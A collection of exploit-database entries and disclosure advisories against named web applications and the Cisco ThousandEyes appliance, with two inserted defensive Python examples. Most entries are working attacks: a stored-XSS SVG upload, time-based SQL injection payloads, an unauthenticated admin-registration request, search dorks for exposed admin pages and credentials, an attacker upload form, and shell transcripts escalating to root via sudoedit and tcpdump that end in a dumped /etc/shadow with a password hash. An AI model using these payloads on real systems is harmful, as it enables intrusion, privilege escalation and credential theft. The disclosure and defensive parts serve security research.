<pre><code># Exploit Title: Academy LMS 6.1 - Arbitrary File Upload<br /># Exploit Author: CraCkEr<br /># Date: 05/08/2023<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://academylms.net/<br /># Software Link: https://demo.academylms.net/<br /># Tested on: Windows 10 Pro<br /># Impact: Allows User to upload files to the web server<br /># CWE: CWE-79 - CWE-74 - CWE-707<br /><br /><br />## Description<br /><br />Allows Attacker to upload malicious files onto the server, such as Stored XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. Login as a [Normal User]<br />2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings<br />3. Upload any Image into the [avatar]<br />4. Capture the POST Request with [Burp Proxy Intercept]<br />5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]<br /> <br />-----------------------------------------------------------<br />POST /wp-admin/async-upload.php HTTP/2<br /><br />-----------------------------------------------------------<br />Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert("XSS by CraCkEr");<br /> </script><br /></svg><br />-----------------------------------------------------------<br /><br />6. Send the Request<br />7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]<br />8. Access your Uploaded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg<br /><br /><br /><br />[-] Done<br /></code></pre>
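A server-side check for the SVG avatar case above, added here as an example that is not part of CraCkEr's advisory or of Academy LMS: it parses the upload, refuses script elements, event-handler attributes and javascript:/data: hrefs, and only then accepts the file. The function names and the two sample SVGs are constructed for the demo.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# Elements that execute script, embed foreign content or reference other documents.
FORBIDDEN_TAGS = {"script", "foreignObject", "iframe", "embed", "object",
                  "use", "animate", "set", "handler"}
RASTER_EXTS = {"png", "jpg", "jpeg", "gif", "webp"}


def svg_findings(data: bytes) -> list[str]:
    """Return the reasons an SVG upload must be refused; an empty list means clean."""
    findings = []
    head = data[:2048].lower()
    # An avatar never needs a DOCTYPE or ENTITY declaration; refusing them keeps
    # entity-expansion tricks away from the XML parser altogether.
    if b"<!doctype" in head or b"<!entity" in head:
        findings.append("DOCTYPE/ENTITY declaration present")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        findings.append(f"root element is {root.tag!r}, not <svg>")
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1]          # strip the namespace prefix
        if local in FORBIDDEN_TAGS:
            findings.append(f"forbidden element <{local}>")
        for attr, value in el.attrib.items():
            attr_local = attr.rsplit("}", 1)[-1]   # covers href and xlink:href alike
            if attr_local.lower().startswith("on"):
                findings.append(f"event handler {attr_local} on <{local}>")
            elif attr_local == "href":
                scheme = value.strip().lower().replace(" ", "")
                if scheme.startswith(("javascript:", "data:", "vbscript:")):
                    findings.append(f"unsafe URL scheme in href on <{local}>")
            elif attr_local == "style" and "url(" in value.lower():
                findings.append(f"external reference in style on <{local}>")
    return findings


def accept_avatar(filename: str, content_type: str, data: bytes) -> bool:
    """Avatar policy: raster images pass (a real check also verifies magic bytes);
    an SVG passes only with no findings. Even an accepted SVG should be served with
    Content-Disposition: attachment or a sandboxing CSP, because a browser that
    opens the file directly will execute any script inside it."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in RASTER_EXTS and content_type.startswith("image/") and content_type != "image/svg+xml":
        return True
    if ext == "svg" or content_type == "image/svg+xml":
        return not svg_findings(data)
    return False


# Constructed samples modelled on the advisory's request body (not copied from it).
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
 <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
 <script type="text/javascript">alert("XSS");</script>
</svg>"""
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
 <polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""

if __name__ == "__main__":
    print(svg_findings(MALICIOUS_SVG))
    print(accept_avatar("ahacka.svg", "image/svg+xml", MALICIOUS_SVG))
    print(accept_avatar("avatar.svg", "image/svg+xml", BENIGN_SVG))
```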
<pre><code># Exploit Title: Credit Lite 1.5.4 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 31/07/2023<br /># Vendor: Hobby-Tech<br /># Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392<br /># Software Link: https://credit-lite.appshat.xyz/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /># CVE: CVE-2023-4407<br /># CWE: CWE-89 - CWE-74 - CWE-707<br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data, modification of<br />data, and crashing the application or making it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br /><br />## Steps to Reproduce:<br /><br />To Catch the POST Request<br /><br />1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement<br /><br />2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter]<br /><br /><br /><br />Path: /portal/reports/account_statement<br /><br />POST parameter 'date1' is vulnerable to SQL Injection<br />POST parameter 'date2' is vulnerable to SQL Injection<br /><br />-------------------------------------------------------------------------<br />POST /portal/reports/account_statement HTTP/2<br /><br />_token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001<br />-------------------------------------------------------------------------<br /><br />---<br />Parameter: date1 (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001<br /><br />Parameter: date2 (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001<br />---<br /><br /><br /><br />[-] Done<br /></code></pre>
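How the account_statement filter above should treat date1, date2 and account_number, added here as an example that is not from the Credit Lite advisory or the product: the time-based payload only works because the date strings are spliced into the SQL text, so the values are validated as dates and bound as parameters, and the same payload is refused before any query runs. The table and column names, the in-memory database and the two request dicts are constructed for the demo.

```python
import sqlite3
from datetime import date


class BadInput(ValueError):
    """Raised for any request value that is not exactly what the filter expects."""


def parse_iso_date(name: str, value: str) -> date:
    """Strict YYYY-MM-DD validation; anything else, SQL fragments included, is refused."""
    try:
        return date.fromisoformat(value)
    except (TypeError, ValueError):
        raise BadInput(f"{name}: expected YYYY-MM-DD") from None


def parse_account_number(value: str) -> int:
    if not value.isdigit():
        raise BadInput("account_number: expected digits")
    return int(value)


def account_statement(conn: sqlite3.Connection, form: dict) -> list[tuple]:
    d1 = parse_iso_date("date1", form.get("date1", ""))
    d2 = parse_iso_date("date2", form.get("date2", ""))
    if d1 > d2:
        raise BadInput("date1 must not be after date2")
    acct = parse_account_number(form.get("account_number", ""))
    # The values travel as bound parameters and never become part of the SQL string.
    sql = ("SELECT trans_date, amount FROM transactions "
           "WHERE account_number = ? AND trans_date BETWEEN ? AND ? "
           "ORDER BY trans_date")
    return conn.execute(sql, (acct, d1.isoformat(), d2.isoformat())).fetchall()


def demo_db() -> sqlite3.Connection:
    """Constructed sample ledger standing in for the application's MySQL table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE transactions (account_number INTEGER, trans_date TEXT, amount REAL)")
    conn.executemany("INSERT INTO transactions VALUES (?, ?, ?)", [
        (20005001, "2023-07-01", 100.0),
        (20005001, "2023-07-31", -25.5),
        (20005001, "2023-08-02", 10.0),
        (20005002, "2023-07-15", 999.0),
    ])
    return conn


# Constructed requests: a legitimate filter, and the advisory's time-based probe in date1.
GOOD_FORM = {"date1": "2023-07-01", "date2": "2023-07-31", "account_number": "20005001"}
SQLI_FORM = {"date1": "2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z",
             "date2": "2023-07-31", "account_number": "20005001"}


def run_form(form: dict) -> tuple:
    """Return ('ok', rows) for a valid request or ('rejected', reason) for a bad one."""
    try:
        return ("ok", account_statement(demo_db(), form))
    except BadInput as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    print(run_form(GOOD_FORM))
    print(run_form(SQLI_FORM))
```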
<pre><code># Exploit Title: Crypto Currency Tracker (CCT) - Admin Account Creation (Unauthenticated)<br /># Date: 11.08.2023<br /># Exploit Author: 0xBr<br /># Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008<br /># Version: <=9.5<br /># CVE: CVE-2023-37759<br /><br />POST /en/user/register HTTP/2<br />Host: localhost<br />Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-GB,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 756<br /><br />_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Fara Melk Estate CMS v1.5.0 unauthorized administrative access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://www.20script.ir/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Unauthorized administrative access. Allows users to access the administrative interface.<br /><br />[+] Use Payload : /admin-assets/tables.html#<br /><br />[+] http://127.0.0.1/fara/admin-assets/tables.html#<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : evsanati radyo v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine <br /><br />[+] infected file : /upload/yukle.php<br /><br />[+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them<br /><br />[+] Some web sites have deleted the upload file so use this code ( note : use after login )<br /><br />[+] line 5 set your target<br /><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br /></head><br /><br /><form action="http://127.0.0.1/gazipasayalcinemlakcom/upload/yukle.php" method="post" enctype="multipart/form-data"><br /><br /><br /><div align="center"><br /><br /><br /><table border="0" cellspacing="0" cellpadding="0"><br /> <tr><br /> <td><b>Resmi Secin :</b></td><br /> <td>&nbsp;<input type="file" name="dosya" size="20"></td><br /> </tr><br /> <tr><br /> <td></td><br /> <td><br /><input type="submit" value="Yukle" style="width:220px;"></td><br /> </tr><br /></table><br /><br /><br /></div><br /><br /></form><br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Event Locations CMS V1.0.1 - unrestricted files upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679 | <br />| # Dork : "/events_edit.php?id=" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Allows any visitor to upload malicious files and run them<br /><br />[+] click to create a Nouveau RDV & in the Upload Image box upload your Ev!l.<br /><br />[+] go to http://127.0.0.1/cutgg/assets/uploads/ <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DoorGets CMS v7.0 Sensitive information disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory | <br />| # Dork : "Powered with doorGets ™" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Payload gives you the username and password for the site script manager.<br /><br />[+] The problem is caused when the installation folder is not deleted by the user.<br /><br />[+] In this case the developer made a mistake.<br /><br /> So that after installation, the script does not delete the installation file or notify the user to change the folder path or delete it. <br /><br /> It also stores the manager's information in temporary files that any visitor can scan and can use this information to access the script control panel.<br /><br />[+] Use Payload : setup/temp/admin.php<br /><br />[+] it shows you login information for admin access.<br /><br />[+] http://127.0.0.1/watsingschoolacth/v12/setup/temp/admin.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Emaar – Real Estate Agency Directory System v5.7 Unrestricted File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | <br />| # Vendor : https://codecanyon.net/item/emaar-real-estate-agency-directory-system/23200024?s_rank=92 | <br />| # Dork : "© 2019 Emaar. All Rights Reserved." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Create a new user & login.<br /><br />[+] Go to http://127.0.0.1/theme.meteros.agency/Emaar/Users/Emaar%20company/edit.<br /><br />[+] upload your Ev!l.<br /><br />[+] Uploaded malicious files can be run remotely<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>KL-001-2023-003: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit<br /><br />Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit<br />Advisory ID: KL-001-2023-003<br />Publication Date: 2023.08.17<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-003.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: ThousandEyes<br /> Affected Product: ThousandEyes Enterprise Agent Virtual Appliance<br /> Affected Version: thousandeyes-va-64-18.04 0.218<br /> Platform: Linux / Ubuntu 18.04<br /> CWE Classification: CWE-1395: Dependency on Vulnerable<br /> Third-Party Component<br /> CVE ID: CVE-2023-22809<br /><br /><br />2. Vulnerability Description<br /><br /> An unpatched vulnerability in 'sudoedit', allowed by sudo<br /> configuration, permits a low-privilege user to modify arbitrary<br /> files as root and subsequently execute arbitrary commands as<br /> root.<br /><br /><br />3. Technical Description<br /><br /> The ThousandEyes Virtual Appliance is distributed with<br /> a restrictive set of commands that can be executed via<br /> sudo, without having to provide the password for the<br /> 'thousandeyes' account. However, the ability to execute<br /> sudoedit of a specific file (/etc/hosts) via sudo is permitted<br /> without requiring the password. The sudoedit binary can<br /> be abused to allow the modification of any file on the<br /> filesystem. This is a known security vulnerability (per<br /> https://seclists.org/oss-sec/2023/q1/42), but had not been<br /> disclosed for the ThousandEyes Virtual Appliance. This can be<br /> abused to allow root-level compromise of the virtual appliance.<br /><br /> thousandeyes@thousandeyes-va:~$ id<br /> uid=1000(thousandeyes) gid=1000(thousandeyes) <br />groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)<br /> thousandeyes@thousandeyes-va:~$ sudo -l<br /> Matching Defaults entries for thousandeyes on thousandeyes-va:<br /> env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin<br /><br /> User thousandeyes may run the following commands on thousandeyes-va:<br /> (ALL : ALL) ALL<br /> (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, <br />/bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop<br /> te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start <br />te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart<br /> te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, <br />/usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,<br /> /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, <br />/usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install<br /> te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, <br />/usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*<br /> (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump<br /><br /> Here we see that /usr/local/bin/te-* are executable as root with no<br /> password. Even though sudoedit is only permitted to edit /etc/hosts,<br /> we can use EDITOR= to spawn vim to edit an arbitrary file. Pick one<br /> of those scripts because we can then execute it:<br /><br /> thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config<br /> /usr/local/bin/te-set-config: Python script, ASCII text executable<br /> thousandeyes@thousandeyes-va:~$ EDITOR='vim -- /usr/local/bin/te-set-config' sudoedit /etc/hosts<br /> sudoedit: --: editing files in a writable directory is not permitted<br /> 2 files to edit<br /> sudoedit: /etc/hosts unchanged<br /> thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config<br /> /usr/local/bin/te-set-config: ASCII text<br /> thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config<br /> /bin/bash<br /> thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config<br /> root@thousandeyes-va:~# id<br /> uid=0(root) gid=0(root) groups=0(root)<br /> root@thousandeyes-va:~#<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> The vendor has released a version which remediates the described<br /> vulnerability. Release notes are available at:<br /><br /> https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf18994<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jim Becher of<br /> KoreLogic, Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2023.04.26 - KoreLogic submits vulnerability details to Cisco.<br /> 2023.04.26 - Cisco acknowledges receipt and the intention to<br /> investigate.<br /> 2023.05.04 - Cisco notifies KoreLogic that a remediation for this<br /> vulnerability is expected to be available within<br /> 90 days.<br /> 2023.06.30 - 45 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2023.07.11 - Cisco informs KoreLogic that the issue has been<br /> remediated in the latest ThousandEyes Virtual<br /> Appliance and a Third Party Software Release Note<br /> Enclosure will be released 2023.08.16. Cisco<br /> provides CVE-2023-22809 to track this vulnerability.<br /> 2023.07.24 - 60 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2023.08.16 - Cisco public acknowledgement.<br /> 2023.08.17 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> See 3. Technical Description.<br /><br /><br />The contents of this advisory are copyright(c) 2023<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
<pre><code>KL-001-2023-002: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation via tcpdump<br /><br />Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation via tcpdump<br />Advisory ID: KL-001-2023-002<br />Publication Date: 2023.08.17<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-002.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: ThousandEyes<br /> Affected Product: ThousandEyes Enterprise Agent Virtual Appliance<br /> Affected Version: thousandeyes-va-64-18.04 0.218<br /> Platform: Linux / Ubuntu 18.04<br /> CWE Classification: CWE-1395: Dependency on Vulnerable<br /> Third-Party Component<br /> CVE ID: CVE-2023-20224<br /><br /><br />2. Vulnerability Description<br /><br /> An insecure sudo configuration permits a low-privilege user<br /> to run arbitrary commands as root via the 'tcpdump' command<br /> without a password.<br /><br /><br />3. Technical Description<br /><br /> The ThousandEyes Virtual Appliance is distributed with a<br /> restrictive set of commands that can be executed via sudo,<br /> without having to provide the password for the 'thousandeyes'<br /> account. However, the ability to execute tcpdump via sudo is<br /> permitted without requiring the password. The post-rotate<br /> functionality of tcpdump can be used to execute arbitrary<br /> commands on the virtual appliance, allowing a privilege<br /> escalation to root. This is a known privilege escalation<br /> path, but had not been disclosed for the ThousandEyes Virtual<br /> Appliance.<br /><br /> $ ssh -c aes256-ctr -p 22 -i 1000eyes-id_rsa thousandeyes@1.3.3.7<br /> Welcome to ThousandEyes!<br /> Last login: Tue Jan 3 20:16:37 2023 from 1.3.3.8<br /> thousandeyes@thousandeyes-va:~$ id<br /> uid=1000(thousandeyes) gid=1000(thousandeyes) <br />groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)<br /> thousandeyes@thousandeyes-va:~$ sudo -l<br /> Matching Defaults entries for thousandeyes on thousandeyes-va:<br /> env_reset, mail_badpass, <br />secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin<br /><br /> User thousandeyes may run the following commands on thousandeyes-va:<br /> (ALL : ALL) ALL<br /> (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, <br />/bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop<br /> te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start <br />te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart<br /> te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, <br />/usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,<br /> /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, <br />/usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install<br /> te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, <br />/usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*<br /> (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump<br /><br /> Here we see that tcpdump is available as root with no password,<br /> and no restrictions on the arguments it can be passed.<br /><br /> Prepare a malicious script, then have tcpdump execute it as a<br /> postrotate command. Note, this needs to be more than simply<br /> a setuid copy of bash as it will drop privs if UID!=EUID, but<br /> python will not.<br /><br /> thousandeyes@thousandeyes-va:~$ cat /tmp/x4<br /> COMMAND='cp /usr/bin/python3.6 /python3.6; chmod u+s /python3.6'<br /> TF=$(mktemp)<br /> echo "$COMMAND" > $TF<br /> chmod +x $TF<br /> sudo /usr/sbin/tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root<br /><br /> thousandeyes@thousandeyes-va:~$ cat /tmp/runme4<br /> /python3.6 -c 'import os; os.setuid(0); os.system("/bin/sh")'<br /><br /> thousandeyes@thousandeyes-va:~$ /tmp/x4<br /> dropped privs to root<br /> tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes<br /><br /> In another ssh session as the 'thousandeyes' user, execute<br /> 'ping -c 1 127.0.0.1' to trigger tcpdump rotation:<br /><br /> Maximum file limit reached: 1<br /> 1 packet captured<br /> 4 packets received by filter<br /> 0 packets dropped by kernel<br /><br /> Execute the setuid python which then launches a shell:<br /><br /> thousandeyes@thousandeyes-va:/tmp$ /tmp/runme4<br /> # id<br /> uid=0(root) gid=1000(thousandeyes) <br />groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)<br /><br /> # bash<br /> root@thousandeyes-va:~# id<br /> uid=0(root) gid=1000(thousandeyes) <br />groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)<br /><br /> root@thousandeyes-va:~# cat /etc/shadow<br /> root:!:19145:0:99999:7:::<br /> daemon:!*:18885:0:99999:7:::<br /> bin:!*:18885:0:99999:7:::<br /> sys:!*:18885:0:99999:7:::<br /> sync:!*:18885:0:99999:7:::<br /> games:!*:18885:0:99999:7:::<br /> man:!*:18885:0:99999:7:::<br /> lp:!*:18885:0:99999:7:::<br /> mail:!*:18885:0:99999:7:::<br /> news:!*:18885:0:99999:7:::<br /> uucp:!*:18885:0:99999:7:::<br /> proxy:!*:18885:0:99999:7:::<br /> www-data:!*:18885:0:99999:7:::<br /> backup:!*:18885:0:99999:7:::<br /> list:!*:18885:0:99999:7:::<br /> irc:!*:18885:0:99999:7:::<br /> gnats:!*:18885:0:99999:7:::<br /> nobody:*:18885:0:99999:7:::<br /> systemd-network:!*:18885:0:99999:7:::<br /> systemd-resolve:!*:18885:0:99999:7:::<br /> syslog:!*:18885:0:99999:7:::<br /> messagebus:!*:18885:0:99999:7:::<br /> _apt:!*:18885:0:99999:7:::<br />thousandeyes:$6$qvB7Zfsh1fFCuBM9$l3X3Gj/7v.IY54N5YMFj5hpd.FbYOfqFPRcNxcOslO3M1MFfxcnUk1MNqtivetWIOTIfv.Z3ELQh5PPTUc2YL0:19146:7:364:30:::<br /> rdnssd:!*:19146:7:99999:30:::<br /> browserbot:!:19146::::::<br /> cntlm:!*:19146:7:99999:30:::<br /> sshd:!*:19146:7:99999:30:::<br /> root@thousandeyes-va:~#<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> The vendor has released a version which remediates the described<br /> vulnerability. Release notes are available at:<br /><br />https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-thoueye-privesc-NVhHGwb3<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jim Becher of<br /> KoreLogic, Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2023.04.26 - KoreLogic submits vulnerability details to Cisco.<br /> 2023.04.26 - Cisco acknowledges receipt and the intention to<br /> investigate.<br /> 2023.05.04 - Cisco notifies KoreLogic that a remediation for this<br /> vulnerability is expected to be available within<br /> 90 days.<br /> 2023.06.30 - 45 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2023.07.11 - Cisco informs KoreLogic that the issue has been<br /> remediated in the latest ThousandEyes Virtual<br /> Appliance and a public advisory will be released<br /> 2023.08.16.<br /> 2023.07.24 - 60 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2023.08.09 - Cisco provides KoreLogic with CVE-2023-20224 to<br /> track this vulnerability.<br /> 2023.08.16 - Cisco public acknowledgement.<br /> 2023.08.17 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> See 3. Technical Description.<br /><br /><br />The contents of this advisory are copyright(c) 2023<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br 